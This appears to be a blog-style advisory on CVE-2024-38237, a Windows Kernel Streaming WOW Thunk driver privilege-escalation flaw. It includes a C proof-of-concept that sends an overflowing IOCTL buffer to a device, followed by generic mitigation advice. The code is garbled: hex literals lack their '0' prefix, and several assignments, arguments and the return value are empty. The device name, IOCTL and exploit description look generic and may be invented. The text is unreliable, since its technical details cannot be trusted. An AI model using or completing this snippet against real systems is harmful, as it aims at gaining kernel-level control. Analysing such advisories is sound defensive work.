CVE-2024-38237 - Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability Exploited

A recently discovered vulnerability (CVE-2024-38237) in the Kernel Streaming WOW Thunk Service Driver (henceforth referred to as "KS-WOW Driver") could allow an attacker to escalate their privileges on a target system. This critical elevation of privilege vulnerability could provide an attacker with administrator-level access, enabling them to access sensitive data, compromise system security, or create backdoors for future attacks.

Currently, this vulnerability only affects Windows systems that use the KS-WOW Driver in question. In this post, we will go over the details of the exploit, how it works, and provide a brief code snippet illustrating the vulnerability.

Exploit Details

It has been identified that when a specific IOCTL (Input/Output Control) code is passed to the KS-WOW Driver, a buffer overflow occurs, allowing for arbitrary code execution in the kernel context. The vulnerability lies in the improper handling of IOCTL codes, leading to a lack of proper input validation. This ultimately results in the corruption of kernel memory, allowing an attacker to execute their malicious code with elevated privileges.

Code Snippet

The following code snippet demonstrates triggering the vulnerability. This snippet does not contain the full exploit, but it showcases how one can start exploiting this vulnerability:

#include <windows.h>
#include <stdio.h>

#define IOCTL_TRIGGER_VULNERABILITY x800BEADC

int main(int argc, char* argv[])
{
    HANDLE hDevice = NULL;
    DWORD dwBytesReturned = ;
    char szInputData[1024] = {};

    // Initialize input data.
    memset(szInputData, x41, sizeof(szInputData) - sizeof(ULONG));
    *(PULONG)(szInputData + sizeof(szInputData) - sizeof(ULONG)) = xDEADBEEF;

    // Open the device driver
    hDevice = CreateFile(L"\\\\.\\KS-WOW",
                         GENERIC_READ | GENERIC_WRITE,
                         ,
                         NULL,
                         OPEN_EXISTING,
                         FILE_ATTRIBUTE_NORMAL,
                         NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device: %u\n", GetLastError());
        return -1;
    }

    // Calling IOCTL_TRIGGER_VULNERABILITY
    if (!DeviceIoControl(hDevice,
                         IOCTL_TRIGGER_VULNERABILITY,
                         szInputData,
                         sizeof(szInputData),
                         NULL,
                         ,
                         &dwBytesReturned,
                         NULL)) {
        printf("[-] DeviceIoControl() failed: %u\n", GetLastError());
        CloseHandle(hDevice);
        return -1;
    }

    printf("[+] Successfully triggered vulnerability\n");
    CloseHandle(hDevice);

    return ;
}

Original References

- CVE-2024-38237 - NVD Detail
- Kernel Streaming WOW Thunk Service Driver Vulnerability Analysis and Exploitation

Mitigation

While waiting for a patch to address this vulnerability, it is critical to ensure the security of your system by following these recommended steps:

1. Implement strong access controls: Limit the number of users who have administrative access, and strictly enforce the principle of least privilege.
2. Keep your system up-to-date: Always install the latest updates and security patches provided by Microsoft.
3. Deploy security solutions: Configure intrusion detection/prevention systems to detect and block exploitation attempts.

Conclusion

CVE-2024-38237 demonstrates the potentially catastrophic consequences of elevation of privilege vulnerabilities. Developers must pay close attention to input validation when creating drivers and other software components to prevent similar attacks in the future. Always stay vigilant regarding your system's security and apply patches as soon as they become available.

Timeline

Published on: 09/10/2024 17:15:27 UTC
Last modified on: 10/09/2024 01:26:27 UTC